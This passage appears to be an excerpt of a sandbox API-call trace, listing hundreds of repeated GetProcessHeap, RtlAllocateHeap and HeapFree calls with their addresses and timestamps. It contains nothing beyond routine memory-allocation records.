lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0124.106] GetProcessHeap () returned 0xe30000 [0124.106] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0124.106] GetProcessHeap () returned 0xe30000 [0124.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.106] GetProcessHeap () returned 0xe30000 [0124.106] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.106] GetProcessHeap () returned 0xe30000 [0124.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.106] GetProcessHeap () returned 0xe30000 [0124.106] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0124.106] GetProcessHeap () returned 0xe30000 [0124.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0124.106] GetProcessHeap () returned 0xe30000 [0124.106] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0124.106] GetProcessHeap () returned 0xe30000 [0124.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0124.106] GetProcessHeap () returned 0xe30000 [0124.106] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0124.106] GetProcessHeap () returned 0xe30000 [0124.106] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0124.107] GetProcessHeap () returned 0xe30000 [0124.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.107] GetProcessHeap () returned 0xe30000 [0124.107] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.107] GetProcessHeap () returned 0xe30000 [0124.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.107] GetProcessHeap () returned 0xe30000 [0124.107] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.107] GetProcessHeap () returned 0xe30000 [0124.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0124.107] GetProcessHeap () returned 0xe30000 [0124.107] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0124.107] GetProcessHeap () returned 0xe30000 [0124.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.107] GetProcessHeap () returned 0xe30000 [0124.107] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.107] GetProcessHeap () returned 0xe30000 [0124.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.107] GetProcessHeap () returned 0xe30000 [0124.107] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.107] GetProcessHeap () returned 0xe30000 [0124.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.107] GetProcessHeap () returned 0xe30000 [0124.107] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.107] GetProcessHeap () returned 0xe30000 [0124.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0124.107] GetProcessHeap () returned 0xe30000 [0124.107] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0124.107] GetProcessHeap () returned 0xe30000 [0124.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0124.107] GetProcessHeap () returned 0xe30000 [0124.107] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0124.107] GetProcessHeap () returned 0xe30000 [0124.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0124.107] GetProcessHeap () returned 0xe30000 [0124.107] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0124.107] GetProcessHeap () returned 0xe30000 [0124.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0124.107] GetProcessHeap () returned 0xe30000 [0124.107] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0124.107] GetProcessHeap () returned 0xe30000 [0124.107] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0124.107] GetProcessHeap () returned 0xe30000 [0124.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0124.108] GetProcessHeap () returned 0xe30000 [0124.108] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0124.108] GetProcessHeap () returned 0xe30000 [0124.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0124.108] GetProcessHeap () returned 0xe30000 [0124.108] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0124.108] GetProcessHeap () returned 0xe30000 [0124.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0124.108] GetProcessHeap () returned 0xe30000 [0124.108] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0124.108] GetProcessHeap () returned 0xe30000 [0124.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0124.108] GetProcessHeap () returned 0xe30000 [0124.108] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0124.108] GetProcessHeap () returned 0xe30000 [0124.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0124.108] GetProcessHeap () returned 0xe30000 [0124.108] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.108] GetProcessHeap () returned 0xe30000 [0124.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.108] GetProcessHeap () returned 0xe30000 [0124.108] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0124.108] GetProcessHeap () returned 0xe30000 [0124.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0124.108] GetProcessHeap () returned 0xe30000 [0124.108] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0124.108] GetProcessHeap () returned 0xe30000 [0124.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0124.108] GetProcessHeap () returned 0xe30000 [0124.108] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.108] GetProcessHeap () returned 0xe30000 [0124.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.108] GetProcessHeap () returned 0xe30000 [0124.108] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.108] GetProcessHeap () returned 0xe30000 [0124.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.108] GetProcessHeap () returned 0xe30000 [0124.108] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0124.108] GetProcessHeap () returned 0xe30000 [0124.108] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.108] GetProcessHeap () returned 0xe30000 [0124.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.109] GetProcessHeap () returned 0xe30000 [0124.109] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.109] GetProcessHeap () returned 0xe30000 [0124.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0124.109] GetProcessHeap () returned 0xe30000 [0124.109] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0124.109] GetProcessHeap () returned 0xe30000 [0124.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.109] GetProcessHeap () returned 0xe30000 [0124.109] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.109] GetProcessHeap () returned 0xe30000 [0124.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.109] GetProcessHeap () returned 0xe30000 [0124.109] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.109] GetProcessHeap () returned 0xe30000 [0124.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0124.109] GetProcessHeap () returned 0xe30000 [0124.109] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0124.109] GetProcessHeap () returned 0xe30000 [0124.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0124.109] GetProcessHeap () returned 0xe30000 [0124.109] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0124.109] GetProcessHeap () returned 0xe30000 [0124.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0124.109] GetProcessHeap () returned 0xe30000 [0124.109] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0124.109] GetProcessHeap () returned 0xe30000 [0124.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.109] GetProcessHeap () returned 0xe30000 [0124.109] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.109] GetProcessHeap () returned 0xe30000 [0124.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.109] GetProcessHeap () returned 0xe30000 [0124.109] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.109] GetProcessHeap () returned 0xe30000 [0124.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0124.109] GetProcessHeap () returned 0xe30000 [0124.109] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.109] GetProcessHeap () returned 0xe30000 [0124.109] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0124.109] GetProcessHeap () returned 0xe30000 [0124.110] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0124.110] GetProcessHeap () returned 0xe30000 [0124.110] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.110] GetProcessHeap () returned 0xe30000 [0124.110] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.110] GetProcessHeap () returned 0xe30000 [0124.110] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0124.110] GetProcessHeap () returned 0xe30000 [0124.110] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0124.110] GetProcessHeap () returned 0xe30000 [0124.110] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.110] GetProcessHeap () returned 0xe30000 [0124.110] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.110] GetProcessHeap () returned 0xe30000 [0124.110] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0124.110] GetProcessHeap () returned 0xe30000 [0124.110] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0124.110] GetProcessHeap () returned 0xe30000 [0124.110] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.110] GetProcessHeap () returned 0xe30000 [0124.110] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.110] GetProcessHeap () returned 0xe30000 [0124.110] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.110] GetProcessHeap () returned 0xe30000 [0124.110] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.110] GetProcessHeap () returned 0xe30000 [0124.110] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0124.110] GetProcessHeap () returned 0xe30000 [0124.110] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.110] GetProcessHeap () returned 0xe30000 [0124.110] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.110] GetProcessHeap () returned 0xe30000 [0124.110] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.110] GetProcessHeap () returned 0xe30000 [0124.110] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0124.110] GetProcessHeap () returned 0xe30000 [0124.110] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0124.110] GetProcessHeap () returned 0xe30000 [0124.110] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.110] GetProcessHeap () returned 0xe30000 [0124.110] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.110] GetProcessHeap () returned 0xe30000 [0124.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0124.111] GetProcessHeap () returned 0xe30000 [0124.111] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0124.111] GetProcessHeap () returned 0xe30000 [0124.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0124.111] GetProcessHeap () returned 0xe30000 [0124.111] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0124.111] GetProcessHeap () returned 0xe30000 [0124.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.111] GetProcessHeap () returned 0xe30000 [0124.111] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.111] GetProcessHeap () returned 0xe30000 [0124.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0124.111] GetProcessHeap () returned 0xe30000 [0124.111] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0124.111] GetProcessHeap () returned 0xe30000 [0124.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0124.111] GetProcessHeap () returned 0xe30000 [0124.111] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.111] GetProcessHeap () returned 0xe30000 [0124.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.111] GetProcessHeap () returned 0xe30000 [0124.111] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.111] GetProcessHeap () returned 0xe30000 [0124.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.111] GetProcessHeap () returned 0xe30000 [0124.111] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.111] GetProcessHeap () returned 0xe30000 [0124.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0124.111] GetProcessHeap () returned 0xe30000 [0124.111] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0124.111] GetProcessHeap () returned 0xe30000 [0124.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0124.111] GetProcessHeap () returned 0xe30000 [0124.111] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.111] GetProcessHeap () returned 0xe30000 [0124.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0124.111] GetProcessHeap () returned 0xe30000 [0124.111] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0124.111] GetProcessHeap () returned 0xe30000 [0124.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.111] GetProcessHeap () returned 0xe30000 [0124.111] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.112] GetProcessHeap () returned 0xe30000 [0124.112] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0124.112] GetProcessHeap () returned 0xe30000 [0124.112] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0124.112] GetProcessHeap () returned 0xe30000 [0124.112] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0124.112] GetProcessHeap () returned 0xe30000 [0124.112] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0124.112] GetProcessHeap () returned 0xe30000 [0124.112] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0124.112] GetProcessHeap () returned 0xe30000 [0124.112] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0124.112] GetProcessHeap () returned 0xe30000 [0124.112] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0124.112] GetProcessHeap () returned 0xe30000 [0124.112] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0124.112] GetProcessHeap () returned 0xe30000 [0124.112] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.112] GetProcessHeap () returned 0xe30000 [0124.112] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.112] GetProcessHeap () returned 0xe30000 [0124.112] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0124.112] GetProcessHeap () returned 0xe30000 [0124.112] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0124.112] GetProcessHeap () returned 0xe30000 [0124.112] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0124.112] GetProcessHeap () returned 0xe30000 [0124.112] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0124.112] GetProcessHeap () returned 0xe30000 [0124.112] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.112] GetProcessHeap () returned 0xe30000 [0124.112] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.112] GetProcessHeap () returned 0xe30000 [0124.112] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.112] GetProcessHeap () returned 0xe30000 [0124.112] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.112] GetProcessHeap () returned 0xe30000 [0124.112] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0124.112] GetProcessHeap () returned 0xe30000 [0124.112] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0124.112] GetProcessHeap () returned 0xe30000 [0124.112] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.112] GetProcessHeap () returned 0xe30000 [0124.113] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.113] GetProcessHeap () returned 0xe30000 [0124.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0124.113] GetProcessHeap () returned 0xe30000 [0124.113] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0124.113] GetProcessHeap () returned 0xe30000 [0124.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.113] GetProcessHeap () returned 0xe30000 [0124.113] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.113] GetProcessHeap () returned 0xe30000 [0124.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.113] GetProcessHeap () returned 0xe30000 [0124.113] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.113] GetProcessHeap () returned 0xe30000 [0124.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.113] GetProcessHeap () returned 0xe30000 [0124.113] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.113] GetProcessHeap () returned 0xe30000 [0124.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.113] GetProcessHeap () returned 0xe30000 [0124.113] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.113] GetProcessHeap () returned 0xe30000 [0124.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.113] GetProcessHeap () returned 0xe30000 [0124.113] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.113] GetProcessHeap () returned 0xe30000 [0124.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0124.113] GetProcessHeap () returned 0xe30000 [0124.113] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0124.113] GetProcessHeap () returned 0xe30000 [0124.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0124.113] GetProcessHeap () returned 0xe30000 [0124.113] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0124.113] GetProcessHeap () returned 0xe30000 [0124.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.113] GetProcessHeap () returned 0xe30000 [0124.113] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.113] GetProcessHeap () returned 0xe30000 [0124.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0124.113] GetProcessHeap () returned 0xe30000 [0124.113] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.113] GetProcessHeap () returned 0xe30000 [0124.114] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0124.114] GetProcessHeap () returned 0xe30000 [0124.114] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0124.114] GetProcessHeap () returned 0xe30000 [0124.114] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0124.114] GetProcessHeap () returned 0xe30000 [0124.114] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0124.114] GetProcessHeap () returned 0xe30000 [0124.114] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.114] GetProcessHeap () returned 0xe30000 [0124.114] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.114] GetProcessHeap () returned 0xe30000 [0124.114] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.114] GetProcessHeap () returned 0xe30000 [0124.114] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.114] GetProcessHeap () returned 0xe30000 [0124.114] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0124.114] GetProcessHeap () returned 0xe30000 [0124.114] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0124.114] GetProcessHeap () returned 0xe30000 [0124.114] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.114] GetProcessHeap () returned 0xe30000 [0124.114] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.114] GetProcessHeap () returned 0xe30000 [0124.114] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0124.114] GetProcessHeap () returned 0xe30000 [0124.114] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.114] GetProcessHeap () returned 0xe30000 [0124.114] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0124.114] GetProcessHeap () returned 0xe30000 [0124.114] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0124.114] GetProcessHeap () returned 0xe30000 [0124.114] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.114] GetProcessHeap () returned 0xe30000 [0124.114] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.114] GetProcessHeap () returned 0xe30000 [0124.114] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0124.114] GetProcessHeap () returned 0xe30000 [0124.114] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0124.114] GetProcessHeap 